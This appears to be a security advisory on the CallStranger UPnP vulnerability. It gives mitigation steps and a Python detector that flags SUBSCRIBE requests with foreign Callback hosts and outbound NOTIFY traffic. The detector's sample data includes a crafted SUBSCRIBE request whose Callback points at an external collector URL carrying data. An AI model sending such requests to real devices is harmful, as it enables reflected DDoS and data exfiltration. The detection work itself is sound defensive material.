Universal Plug and Play (UPnP) protocol.
What you need to know:
A remote, unauthenticated attacker may be able to abuse the UPnP SUBSCRIBE capability, by supplying an attacker-controlled Callback header, to make the device send traffic to arbitrary destinations, leading to amplified DDoS attacks and data exfiltration.
Actions to be taken:
Since it may take a long time for vendors to patch UPnP devices, enterprises should take their own actions. Depending on their defense-in-depth approach, enterprises may choose different mitigations.
Internet Facing Devices
- Close UPnP Ports to the Internet if there is no business/technical need.
- Close the UPnP services' HTTP (eventing/control) port, a TCP port that is different from the SSDP discovery port UDP 1900, to the Internet. To find out these ports, check the product documentation or use this test tool, a port scanner like Nmap, or UPnP Device Spy.
- Block all HTTP requests using the SUBSCRIBE and NOTIFY methods in ingress and egress traffic.
- Check logs for signs that this vulnerability has been exploited: SUBSCRIBE requests whose Callback header points to a host other than the subscriber (especially an external one), and outbound NOTIFY traffic to unexpected destinations.
- Configure the DDoS protection device or service to block NOTIFY packets.
- Disable UPnP service of IP camera, printer, routers and other devices if it is not a business or technical requirement.
- Check these devices’ Internet access policy (B1)
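The following is an added example, not part of the original advisory or any vendor tool, showing how the "block SUBSCRIBE/NOTIFY" and "check logs" items above can be turned into a concrete check over captured traffic. It parses a SUBSCRIBE request, flags Callback URLs that do not point back at the subscriber itself or that lie outside the internal address space, and scans egress log lines for NOTIFY requests leaving the internal network. The request bytes, log line format and address lists are constructed for this example; the RFC 5737 documentation addresses (198.51.100.x, 203.0.113.x) stand in for public Internet hosts.

```python
"""Added example: spot CallStranger-style UPnP eventing abuse in captured traffic."""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed list of ranges considered "internal" for this example.
# (ipaddress.is_private is not used because it also classifies the
# RFC 5737 documentation ranges used below as private.)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]

# Callback header carries one or more URLs, each in angle brackets.
CALLBACK_URL_RE = re.compile(r"<([^>]+)>")


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, target, headers)."""
    head, _sep, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _colon, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def is_internal_host(host: str) -> bool:
    """True only for a literal IP inside INTERNAL_NETS.
    Hostnames are treated as not provably internal, so they get flagged."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def check_subscribe(raw: bytes, src_ip: str):
    """Examine one captured request that arrived from src_ip.

    Returns (verdict, reasons): "ignore" for non-SUBSCRIBE requests,
    "ok" for a benign subscription, "suspicious" otherwise."""
    method, _target, headers = parse_http_request(raw)
    if method != "SUBSCRIBE":
        return "ignore", []
    reasons = []
    if not is_internal_host(src_ip):
        reasons.append(f"subscriber {src_ip} is not on the internal network")
    for url in CALLBACK_URL_RE.findall(headers.get("callback", "")):
        host = urlsplit(url).hostname or ""
        if host != src_ip:
            reasons.append(f"Callback host {host} is not the subscriber {src_ip}")
        if not is_internal_host(host):
            reasons.append(f"Callback host {host} is outside the internal network")
    return ("suspicious" if reasons else "ok"), reasons


def flag_outbound_notify(log_lines):
    """Return (src, dst) pairs for NOTIFY requests sent to non-internal hosts.

    Expects constructed proxy-style lines: '<src> <dst> <method> <path>'."""
    hits = []
    for line in log_lines:
        src, dst, method, _path = line.split()
        if method == "NOTIFY" and not is_internal_host(dst):
            hits.append((src, dst))
    return hits


# --- constructed samples ---------------------------------------------------
BENIGN = (b"SUBSCRIBE /upnp/event/basicevent1 HTTP/1.1\r\n"
          b"Host: 192.168.1.10:49152\r\n"
          b"Callback: <http://192.168.1.20:8080/notify>\r\n"
          b"NT: upnp:event\r\nTimeout: Second-1800\r\n\r\n")

# Internet-sourced subscription whose callbacks point at two external hosts:
# one collects exfiltrated data, the other is a DDoS reflection victim.
ATTACK = (b"SUBSCRIBE /upnp/event/basicevent1 HTTP/1.1\r\n"
          b"Host: 203.0.113.5:49152\r\n"
          b"Callback: <http://198.51.100.7:80/collect?data=secret>"
          b"<http://203.0.113.9/>\r\n"
          b"NT: upnp:event\r\nTimeout: Second-1800\r\n\r\n")

EGRESS_LOG = ["192.168.1.10 192.168.1.20 NOTIFY /notify",
              "192.168.1.10 198.51.100.7 NOTIFY /collect?data=secret",
              "192.168.1.10 192.168.1.20 POST /upnp/control/basicevent1"]

if __name__ == "__main__":
    print(check_subscribe(BENIGN, "192.168.1.20"))
    print(check_subscribe(ATTACK, "203.0.113.4"))
    print(flag_outbound_notify(EGRESS_LOG))
```

The "Callback host differs from subscriber" rule is the important one: a legitimate control point subscribes to receive events at its own address, so a Callback pointing anywhere else is the signature of CallStranger abuse even when both addresses are internal (for example, internal port scanning via the device).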
DMZ & Server Segment
- Do not place unsecured UPnP devices on this network.
- Be careful with media processing servers: media services may use UPnP. Apply (B1) if it does not affect business or technical requirements.
What is the impact of not doing the actions?
If exploited, this may allow attackers to exfiltrate data, launch denial-of-service attacks, or scan ports. Adversaries can take advantage of CallStranger to bypass data loss prevention (DLP) protections and network security devices and ultimately exfiltrate sensitive data. They can also leverage Internet-facing devices to perform reflected Transmission Control Protocol (TCP) DDoS attacks and to scan ports.